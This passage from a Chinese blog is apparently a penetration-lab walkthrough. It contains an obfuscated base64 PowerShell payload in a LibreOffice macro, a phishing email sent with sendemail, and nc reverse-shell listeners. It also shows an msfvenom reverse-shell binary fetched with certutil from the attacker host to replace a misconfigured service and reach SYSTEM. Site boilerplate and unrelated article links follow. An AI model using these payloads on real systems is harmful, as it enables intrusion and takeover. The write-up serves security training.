	Str = Str + "HcAYQBxAFEAYgBFAHUARQAnACcAKwAnACcAdAA5AEMAbQBpAFY"
	Str = Str + "AVABwAGIARgA2AEMAQwBVADQAZwBEAGkAWgBBADAAVwBtAHgAM"
	Str = Str + "QAvAGEARwB4AFUAdgBYAGEAOQA3AGEALwB2AGMAYgBHAHoAdQB"
	Str = Str + "oAGwAKwBRAHUAZAAxAEoAWABRAG4AaAAzAFoAMgBaAG4AbgAzA"
	Str = Str + "GwAbQBaAHIAMAA0AGQAQQBSAGgAbwBlAFMANQBwAHYAVAA5AC8"
	Str = Str + "AVABzAHAARwAzADMARQAwAFYASgBTAEMAcAB0ACsAcgBTAGcAJ"
	Str = Str + "wAnACsAJwAnAFYAdgBGACcAJwArACcAJwBQADEAYQBhAHUAdwB"
	Str = Str + "HAHYAVwBsAEwANQBJAHkAMQBWAGEAcgBKAGwAcwBpAEUAcwA0A"
	Str = Str + "HUATABoAG8AeAA1AHoAZwBVAGgAMwBuAHAARQBnAHMAdABpAHY"
	Str = Str + "AQgB5AFQAZwBtAHsAMgB9AEYARgBYADYASQBZADAAQwB6AFAAS"
	Str = Str + "ABKAHoAZgB3AEIAewAyAH0AMABMADYATABoAFgAKwBMAEYAMQB"
	Str = Str + "TAE4AawBjADAARQA5AHMAMQBrAEIAJwAnACsAJwAnAE4AZwA2A"
	Str = Str + "FUAUQBMADMAVwBTAHYAeAB4AHkAVQBlAEYAVwB5AFYAcABRAEk"
	Str = Str + "AUgBmADcANgBWAFYAYQBuAEoAOQBWAFoAcQBmAFUAdABSAGoAU"
	Str = Str + "gBTAFoARwBzAFgAQwBiAHcAcwB1AFoAVABLAHEAdgBSAFQAVAB"
	Str = Str + "RADYAewAxAH0AMgA2ADIAdwBJAHAAdgBFADQAUwB4AGkAbgBpA"
	Str = Str + "GkATgBTAEgAaABhAEsAdwAzAEQAQwBIAG4ANABHAHEAeQB0AHM"
	Str = Str + "AWQBsAEYAdwBOAHgASQBoAHIAcwB7ADEAfQAzAFkAWgBqAEUAZ"
	Str = Str + "gBNAHcAdgBWAFIAaQA1AFMAQwBqAHkAUABEAFoANQB7ADEAfQB"
	Str = Str + "6AFIAWABKAGYAagBLAEoASwBMADAAagBTAHgAUAA1ADMATgAvA"
	Str = Str + "GwAQwBtADIAZQBHADMAYwBTAGoASQBFAHAAZQBNAFUARwBEAHs"
	Str = Str + "AMgB9AFYAaABiAG0AYQArAEwAZwBxAE4AUgBCAG8AVQB2AHgAT"
	Str = Str + "ABmAFoAbQBvAEcAVQBKAFQAawBKAC8AcABxAG8AZwB0AG0AWQB"
	Str = Str + "MAHIAQgBUAEMAbQBOAEsAaQA5AEYALwBNAEsATgBkADQAawAwA"
	Str = Str + "FAAMwBWAGkAWABsAFcAQQBtAGsAKwBvAEsAcgBSAFkAagBuAHs"
	Str = Str + "AMQB9ADIAdQBhAHoASQAwAHAAUABpAGoASwBMAC8AaQBaAFUAR"
	Str = Str + "QBDAEYAYwBhAEEAQgBZAFAAYwB6AGcAYwAvAEwAZQBiAFAAWgA"
	Str = Str + "5AFYAWQB2AEUAewAyAH0AZABwAEkAUgAvAFQAZABBAGUARAB2A"
	Str = Str + "DAAcQBmAFIAUwBSAFYALwBpAEoAVgBpAHAASQBKAFIAeQBQAEI"
	Str = Str + "AKwBBADYAbQBoAFQAcwBlAFkAMwBYADIAaQBMAFoAVQAyAEkAW"
	Str = Str + "QBmAEUAUwBxACsAMQBWAHcAMQAxAHcAVgBOAFoAMQBUADUARAB"
	Str = Str + "FAHQAVABtAHgARgAzADkAbQBUAGcAbAArAGcAWAArAEIAbAAyA"
	Str = Str + "DUANABuAFUANgAyAFIAdQBZAG8AKwBFAHUATABrAEwAMABaAEk"
	Str = Str + "ANAB7ADIAfQBWACsAVgBsADQASwBDAFAAWQBwAFQAJwAnACsAJ"
	Str = Str + "wAnAFYARQBxADUAMgBEAFcANABxAE0AagBaAEIAbgBhAGIAbQB"
	Str = Str + "HAEkAZgBpAFEAVABuAGgAQgB2AFAAMQBGAHAATABJAGgANQAxA"
	Str = Str + "DkAWgBoAFEARgAzAFAATgBnAGMAQgBHADQAQgBYAEUAWABQADM"
	Str = Str + "AVgBtAFUAUABvAEYATgBrAEkAVABiAHcARQBBAEEAOQAnACcAK"
	Str = Str + "wAnACcAegB7ADIAfQBZAGsAVQBaAEEAbgB7ADIAfQBwAGIAUAB"
	Str = Str + "NADIAewAyAH0AVwBuAEoAMwBNAFEAawBoAHMAVQAnACcAKwAnA"
	Str = Str + "CcAUgBWAEYAUgA2AHMAZQBRAHAAawA1AFIAcwAnACcAKwAnACc"
	Str = Str + "AagBDAGkAMgBDADEASwBXAGgAaQBSAGIARQB1AEwAQgBVACcAJ"
	Str = Str + "wArACcAJwBzAC8ANQBTAGQAMwB6ACcAJwArACcAJwBaAGcASwA"
	Str = Str + "nACcAKwAnACcANABxAEIASQA1AHsAMgB9AFoAbQA2AHQALwB4A"
	Str = Str + "HoATQA1AHQAcwBEAEEAUwBQAEgAWQBnAHQAbwBEAEIAbgBiAFg"
	Str = Str + "AQwBEAGsARQAwAGcAYQBRAG8AZABZAGkATAA5AFoAMQBGAC8AU"
	Str = Str + "AB4AHsAMQB9ACsAVQBWAEEARwBvAGgAUwB5AEIAKwB3AHQASQB"
	Str = Str + "hAEEAdwBFAG8AQwBoAEMAVQBTAHgAbgBCAHcAOQBjAEEAewAyA"
	Str = Str + "H0AdABXAFIAaABZAFMAeABYAEYAQwA5AEIASwBDADAAYwBiAFk"
	Str = Str + "AcAB7ADEAfQBLAEIATgBaAG0AcQBRAGMAUQB6ADUAMgA1AGQAZ"
	Str = Str + "ABjAHoAJwAnACsAJwAnAGYAUABoAFEAUAA0AEUAbgBCAHkAVgB"
	Str = Str + "JADAAYwBoADQAaABaAGwAbwBpAGoAJwAnACsAJwAnAFoAaABBA"
	Str = Str + "CcAJwArACcAJwB1AG8AUQAnACcAKwAnACcAdwBuAFEAQwBjAG4"
	Str = Str + "AKwBuAHgALwBQAFMAOQBEAEIAbwBRAGIASABXAFkAeQBVAFAAT"
	Str = Str + "gBtAG0AKwBrADQAawAyAFYAQgBZAGYAWQBzAFMAcgBtAFkANAB"
	Str = Str + "wAGEAaAB3AEEAWQBpADAAewAyAH0AVgB2AHEASwAnACcAKwAnA"
	Str = Str + "CcATQBLAGYANgBvAGQANgBvADMAdwBvADMANQBDAEcAQgBtAE4"
	Str = Str + "AcwBoAE4AUgAwADkAQQBXAHAAYQBoAHQAUwBOAFUAegA0AEQAY"
	Str = Str + "wBtAHAAdwBaAHAAbgA3AGwAWAAzAG8AVgBQAG0AegBXADMAZwB"
	Str = Str + "hAFUAWgBrAG0ASgAxACsAYwA5AEQAcAAxAE4AZABkAHkANgA0A"
	Str = Str + "EwAcQAyAFcASQBxADcANABoAHoATgBiADkAdwA0AHsAMgB9AGw"
	Str = Str + "AZABXADYASABZAHoARQB4AHQATQA0AGQAcQBTAHoARwA5AGYAM"
	Str = Str + "gBxAFMALwBaAFcAVAAzAFAASAAyAC8ASwBuAHYAYgA3AGYAVgB"
	Str = Str + "QAFQAdAAvAHMARgAzAHYAWABIAFQAewAxAH0ALwB3AHoAegA3A"
	Str = Str + "HEAdABmAG0AeQBUADMAcQBnAHgAMABDAHMAMQAxAEcAdQAyADQ"
	Str = Str + "AdAA1AEkAMwArAGkAVgBlAHQAUQBpAG0AewAxAH0ANgBBAEQAQ"
	Str = Str + "QBlAEwAYgBsAHYATQB4AHoAWgBGACcAJwArACcAJwBRADYALwB"
	Str = Str + "zADMAMQBmAFAARQBkAG4AMgArAEkATgBkAFoAZQBiAGUAMABMA"
	Str = Str + "FQATAA0AE4AVABaAGQAegAzADcATQBqAEQAZAAzAGIAaABUAFA"
	Str = Str + "AaAAvAFYARgAxAHAATAAwAHgAcABoAHkAMgA3AHIANwBHAHEAc"
	Str = Str + "wBjADYAMQBmAHQAbwBkAHQAZgBUAEIAcwA2AFkATQBCAHIASAA"
	Str = Str + "zAHkAeQAxADQAZAAxAG0AaQBOAHQAWgBIAFoAWQBEADEAbgB3A"
	Str = Str + "GoAUgBmADAAKwBOADYAdQBFAFMAQgBQAHIASgByAFoATABLADY"
	Str = Str + "AdgB3ADMAQQBWAGgAdABjAE0ATQB1AFYAdQB1AEgAaQBMAGYAd"
	Str = Str + "gBjAEcAeABGADcAWABiAGIAUgA1AGIAVwBZAGEASQAxAHUAdgB"
	Str = Str + "lAHIAZQAyAC8AdAB7ADIAfQBEAFEAWABkAGkAUgAzADMAegBpA"
	Str = Str + "GUAUgAyACsAbwAyAE4ANwBvADIAcgByAGEANgBlAHYATgBTAGE"
	Str = Str + "AOQAwAHsAMgB9AGgAKwAzAEoAeQBGADUATQBSAG4AZAAwAE0Aa"
	Str = Str + "ABwAFcASgB3AHcANwBtADMASQBBAE4AZwBqAFcAYgArAHoARgB"
	Str = Str + "2AEcAeABlACsAawBhAHcAcgBmAHAAdwAxAGwAbABxAGYAMABtA"
	Str = Str + "FcAZABGADUAegB5ACsAZgBEAHoAMwBxADQAdQBmAEwANwBhADk"
	Str = Str + "AewAxAH0AZABqAE0ANQB1AHQAOQBlADcAZQBZADEAcAB3ADMAT"
	Str = Str + "ABaAC8AZwBDAHgAbgBnADUASgBLAEUANQByAHMAdwBKAFAASwA"
	Str = Str + "rACcAJwArACcAJwBQADcAZAA0AFgARgBhAFMAKwBvAEgAawBYA"
	Str = Str + "HsAMQB9AHQAYgBKAHYASQBoADQARgBpAEEASQBUAG8ASwBEAG4"
	Str = Str + "AZQBkAGwAbQB2AEoAMQBWADYAVAA0AGoAaQBZAGEAaQBKAEYAM"
	Str = Str + "QArAGcAWABtAEkASwBmAFIARwA2AEoANAA1AGwAVABWAEsAbQB"
	Str = Str + "aAE0AMABpAEwAUwBjAFEAMwBNADYAdABJAHkAawBnAHcAMgAnA"
	Str = Str + "CcAKwAnACcATgAxAEsAbQBYAHYAbABUAHAAVQBWAEIAOQA2AGg"
	Str = Str + "AegA1ADAAcwBYAEYAQgBKAHkARQA1AEEARABXAGwAbgBvADQAO"
	Str = Str + "QBFAFYAUQByAEcAeABQAEsAeABXAG8AKwBaAFYAdABwAFoANwB"
	Str = Str + "tAHcATgB0AHYAMQBtAEMAcgBuAFoATABZAEsAaQBaAE4ANAB3A"
	Str = Str + "EIATgBaAHAAeQBtAHgAcwBFAGUAewAxAH0AUwBSAEYAKwBlADE"
	Str = Str + "AZwB3AGMATgBBAFEASAAxADYASABhADcAWABrAEkAewAyAH0Aa"
	Str = Str + "gBGADEAQgBNAG8ATAA0AGQAMABqAHYAQgBUADIAZQBNAEgAcQB"
	Str = Str + "7ADIAfQBYAFgAKwB5AFIARABFAGYAbwBBAFcAeABWAHUAUABzA"
	Str = Str + "DAAZQBSAFEAQQBTAFUARAAvAEIASAArAFQAQwBpAEwAcABtAGM"
	Str = Str + "AYwA5AHUARQBEAFcAcQA5AC8ASwBtAHEAeABHAEIAZgBEAG4AL"
	Str = Str + "wBoAHQAcgBuAHQAYgArAFkAZgBkAE4AVABLAG8AVQBNADMAQwB"
	Str = Str + "lAHIAZgArADYAYwBGAFQAawBmAHgAewAxAH0ARQBJADAAUQBFA"
	Str = Str + "EMARgBwAFEAYgBTAGsAKwB2AEEATgBlAFIAaQBKAEwAbABhAE0"
	Str = Str + "ASQBRADMAUQBnAEUAYgB4AHMASgBLAC8AagBtADEAaQBjAFgAT"
	Str = Str + "QBOADcASwA2ADMAMwBmAHcARgBIADkAeQBQAFMAawB3AHMAQQB"
	Str = Str + "BAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsA"
	Str = Str + "CcAJwA4ACcAJwAsACcAJwBPACcAJwApACkAKQApACwAWwBTAHk"
	Str = Str + "AcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Ab"
	Str = Str + "gAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA"
	Str = Str + "6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkA"
	Str = Str + "FQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGg"
	Str = Str + "AZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJ"
	Str = Str + "ABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZAB"
	Str = Str + "PAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuA"
	Str = Str + "GQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQ"
	Str = Str + "AcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAd"
	Str = Str + "AByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQB"
	Str = Str + "nAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6A"
	Str = Str + "FMAdABhAHIAdAAoACQAcwApADsA"
	
	Shell(Str)
	
End Sub


## 新建一个表格文档:

## 插入宏:

hta文件:
在这里插入图片描述
处理宏:
在这里插入图片描述

创建一个表格:
在这里插入图片描述
创建宏:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
为文档插入宏:
在这里插入图片描述

在这里插入图片描述

2.4 邮件投递恶意宏文档:

## -u 主题:
## -m 正文:
## -a 附件:
┌──(root㉿kali)-[~/Desktop]
└─# sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.188.140:25 -u 'Your spreadsheet'  -m 'Here is your requested spreadsheet' -a /root/Documents/a.ods 
Mar 02 22:54:03 kali sendemail[2758283]: Email was sent successfully!

在这里插入图片描述

2.5 反弹shell:

 nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.188.140] 49795
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
hepet\ela arwel

C:\Program Files\LibreOffice\program>

3. root priv

3.1 服务配置不当提权:

## 服务查询
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
...
Veyon Service     VeyonService      C:\Users\Ela Arwel\Veyon\veyon-service.exe    Auto UnistackSvcGroup    Auto
...

##
C:\>sc qc VeyonService
sc qc VeyonService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VeyonService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Ela Arwel\Veyon\veyon-service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Veyon Service
        DEPENDENCIES       : Tcpip
                           : RpcSs
        SERVICE_START_NAME : LocalSystem

##
kali@kali:~$  msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.8 LPORT=443 -f exe -o veyon-service.exe

## 我们启动一个简单的Python HTTP 服务器来传输文件。
kali@kali:~$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
现在,在远程 Windows 计算机上,我们备份该服务的二进制文件,并下载我们的恶意版本。

C:\>cd C:\Users\Ela Arwel\Veyon\

C:\Users\Ela Arwel\Veyon>move veyon-service.exe veyon-service.bak
        1 file(s) moved.

C:\Users\Ela Arwel\Veyon>certutil -f -urlcache http://192.168.118.8:8000//veyon-service.exe veyon-service.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

## 设置新的侦听器并重新启动计算机后,我们会收到一个系统 shell。
kali@kali:~$ sudo nc -lvnp 443
listening on [any] 443 ...
## 重启系统:
C:\Users\Ela Arwel\Veyon>shutdown /r
shutdown /r
kali@kali:~$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.188.140] 49669

Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

4.总结:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/424823.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【网上商城系统的设计与开发】

【网上商城系统的设计与开发】

目录 1.实训概况 1 1.1 实训题目 1 1.2实训时间 1 1.3实训目的 1 1.4 实训环境 1 1.5 实训内容 2 1.6 进度安排 3 2.需求分析 5 2.1 功能需求分析 5 2.1.1用户需求分析 5 2.2.2网站前台需求 5 2.2.3网站后台需求 6 2.2 可行性分析 7 2.2.1社会可行性 7 2.2.2技术可行性 8 3.系统…
阅读更多...
通过多进程并发方式(fork)实现服务器(注意要回收子进程)

通过多进程并发方式(fork)实现服务器(注意要回收子进程)

以下内容为视频学习记录。 1、父进程accept后返回的文件描述符为cfd以及用于创建连接的lfd; 调用fork()创建子进程后&#xff0c;子进程继承cfd,lfd&#xff0c;通过该cfd与连接过来的客户端通信,lfd对子进程来说没用&#xff0c;可以直接close(lfd); 对于父进程来说&#x…
阅读更多...
如何利用ChatGPT搞科研?论文检索、写作、基金润色、数据分析、科研绘图(全球地图、植被图、箱型图、雷达图、玫瑰图、气泡图、森林图等)

如何利用ChatGPT搞科研?论文检索、写作、基金润色、数据分析、科研绘图(全球地图、植被图、箱型图、雷达图、玫瑰图、气泡图、森林图等)

以ChatGPT、LLaMA、Gemini、DALLE、Midjourney、Stable Diffusion、星火大模型、文心一言、千问为代表AI大语言模型带来了新一波人工智能浪潮&#xff0c;可以面向科研选题、思维导图、数据清洗、统计分析、高级编程、代码调试、算法学习、论文检索、写作、翻译、润色、文献辅助…
阅读更多...
2023天津公租房网上登记流程图,注册到信息填写

2023天津公租房网上登记流程图,注册到信息填写

2023年天津市公共租赁住房网上登记流程图 小编为大家整理了天津市公共租赁住房网上登记流程&#xff0c;从登记到填写信息。 想要体验的朋友请看一下。 申请天津公共租赁住房时拒绝申报家庭情况会怎样&#xff1f; 天津市住房保障家庭在享受住房保障期间&#xff0c;如在应申…
阅读更多...
安装 node 错误的配置环境变量之后使用 npm 报错,更换淘宝镜像 (cnpm)

安装 node 错误的配置环境变量之后使用 npm 报错,更换淘宝镜像 (cnpm)

安装 node 错误的配置环境变量之后使用 npm 报错&#xff0c;更换淘宝镜像 (cnpm) node:internal/modules/cjs/loader:1147 throw err; ^ Error: Cannot find module ‘F:\ACodeTools\Node\node_modules\npm\bin\node_modules\npm\bin\npm-cli.js’ at Module._resolveFilename…
阅读更多...
JVM(6)

JVM(6)

JMM JVM定义了一种Java内存模型来屏蔽掉各种硬件和操作系统的内存访问差异,以实现让Java程序在各种平台下都能达到一致的内存访问效果.在此之前,C/C直接使用物理硬件和操作系统的内存模型,因此,会由于不同平台下的内存模型差异,有可能导致程序在一套平台上并发完全正常,而在另…
阅读更多...
多输入多输出 | MATLAB实现GWO-Elman灰狼优化循环神经网络多输入多输出预测

多输入多输出 | MATLAB实现GWO-Elman灰狼优化循环神经网络多输入多输出预测

多输入多输出 | MATLAB实现GWO-Elman灰狼优化循环神经网络多输入多输出预测 目录 多输入多输出 | MATLAB实现GWO-Elman灰狼优化循环神经网络多输入多输出预测预测效果基本介绍程序设计往期精彩参考资料 预测效果 基本介绍 Matlab实现GWO-Elman灰狼优化循环神经网络多输入多输出…
阅读更多...
手把手教测试,全网内容最全有深度-jmeter-Flow Control Action

手把手教测试,全网内容最全有深度-jmeter-Flow Control Action

5.1.7.6.Flow Control Action(测试活动) Logical Action on Thread&#xff1a; Pause 暂停&#xff0c;配合 Duration 一起使用&#xff1b;Duration(milliseconds) 延迟时间&#xff0c;单位是毫秒 Start Next Thread Loop 开始本线程下一次循环 设置线程组线程数2&#xff…
阅读更多...
(资源篇)2025届暑假实习春招全攻略路线

(资源篇)2025届暑假实习春招全攻略路线

绝对的全攻略&#xff0c;资源完善程度绝对的全网唯一。 觉得有帮助的&#xff1a;随手一键三连关注就是对up主最大的激励。 绝对的宝藏up主&#xff01;&#xff01;&#xff01;&#xff0c;up主每天都会进行更新视频&#xff0c;算法视频or校招信息or八股讲解。 【暴躁老…
阅读更多...
位运算第二弹

位运算第二弹

力扣191.位1的个数 public class Solution {// you need to treat n as an unsigned valuepublic int hammingWeight(int n) {int ret0;while(n!0){n(n&n-1);ret;}return ret;} } 推荐是自己去手动推一下&#xff0c;深刻理解一下&#xff0c;什么叫做最右侧的1。 力扣338.…
阅读更多...
在docker中搭建selenium 爬虫环境(3分钟快速搭建)

在docker中搭建selenium 爬虫环境(3分钟快速搭建)

1、安装docker 省略 2、拉取镜像 docker pull selenium/standalone-chrome-debug 3、运行容器 docker run -d -p 4444:4444 -p 5900:5900 -v C:\Users\Public\VNC_Donwnloads:/home/seluser/Downloads --memory6g --name selenium_chrome selenium/standalone-chrome-debu…
阅读更多...
[VulnHub靶机渗透] CONNECT THE DOTS

[VulnHub靶机渗透] CONNECT THE DOTS

&#x1f36c; 博主介绍&#x1f468;‍&#x1f393; 博主介绍&#xff1a;大家好&#xff0c;我是 hacker-routing &#xff0c;很高兴认识大家~ ✨主攻领域&#xff1a;【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】 &#x1f389;点赞➕评论➕收藏 …
阅读更多...
《秦时明月》IP新高度:与陕西历史博物馆共同书写文化传承新篇章!

《秦时明月》IP新高度:与陕西历史博物馆共同书写文化传承新篇章!

在IP产业风起云涌的今天&#xff0c;如何以创意和匠心为传统文化注入新的活力&#xff0c;成为了摆在每一位文化工作者面前的重要课题。近日&#xff0c;《秦时明月》作为一部深受观众喜爱的国产动画IP&#xff0c;在迎来其十七周年之际&#xff0c;联手陕西历史博物馆&#xf…
阅读更多...
字符函数和字符串函数(下)

字符函数和字符串函数(下)

个人主页&#xff08;找往期文章包括但不限于本期文章中不懂的知识点&#xff09;&#xff1a;我要学编程(ಥ_ಥ)-CSDN博客 目录 strncpy函数的使用 函数原型&#xff1a; strncpy的使用 strncat函数的使用 函数原型&#xff1a; strncat的使用 strncmp函数的使用 函…
阅读更多...
Vue开发实例(三)项目引入Element-UI

Vue开发实例(三)项目引入Element-UI

项目引入Element-UI 一、引入Element-UI二、注册组件1、vue2使用element-ui2、vue3使用element-ui 三、使用Element组件1、轻微改造2、验证element是否生效 一、引入Element-UI npm i element-ui --save npm install element-ui -S等待安装完成 二、注册组件 1、vue2使用ele…
阅读更多...
Redis缓存示例【一篇看懂数据库缓存的技术redis】

Redis缓存示例【一篇看懂数据库缓存的技术redis】

Redis缓存示例【一篇看懂数据库缓存的技术redis】 环境准备缓存短信验证码缓存菜品信息 因为服务器和数据库直接读写&#xff0c;性能消耗大 我们可以用redis缓存 当服务器想访问数据库时&#xff0c;可以先访问redis&#xff0c;看是否之前访问过想要的数据&#xff0c;这样就…
阅读更多...
51单片机-(中断系统)

51单片机-(中断系统)

51单片机-&#xff08;中断系统&#xff09; 了解51单片机中断系统、中断源、中断响应条件和优先级等&#xff0c;通过外部中断0实现按键控制LED亮灭为例理解中断工作原理和编程实现过程。 1.中断系统结构 89C51/52的中断系统有5个中断源 &#xff0c;2个优先级&#xff0c;…
阅读更多...
【yolov8部署实战】VS2019+OpenCV环境部署yolov8目标检测模型|含详细注释源码

【yolov8部署实战】VS2019+OpenCV环境部署yolov8目标检测模型|含详细注释源码

一、前言 之前一阵子一直在做的就是怎么把yolo项目部署成c项目&#xff0c;因为项目需要嵌套进yolo模型跑算法。因为自己也是本科生小白一枚&#xff0c;基本上对这方面没有涉猎过&#xff0c;自己一个人从网上到处搜寻资料&#xff0c;写代码&#xff0c;调试&#xff0c;期间…
阅读更多...
Trie树(1.字符串统计____2.最大异或对求解)

Trie树(1.字符串统计____2.最大异或对求解)

Trie树 文章目录 Trie树Trie字符串统计正解 最大异或对1.暴力 &#xff08;可以过6/10个测试点)2. Trie树模拟 用法&#xff1a;高效地存储和查找字符串集合的数据结构 存储形式&#xff1a; 将n个单词各个字符进行枚举&#xff0c;若是&#xff08;根节点所指向包含字符c&…
阅读更多...
【javaSE-语法】lambda表达式

【javaSE-语法】lambda表达式

【javaSE-语法】lambda表达式 1. 先回忆一下&#xff1a;1.1 接口不能直接通过关键字new进行实例化1.2 函数式接口1.3 匿名内部类1.31 匿名内部类在代码中长啥样&#xff1f;1.32 构造一个新的对象与构造一个扩展了某类的匿名内部类的对象&#xff0c;两者有什么区别&#xff1…
阅读更多...
最新文章

Copyright @ 2022~2023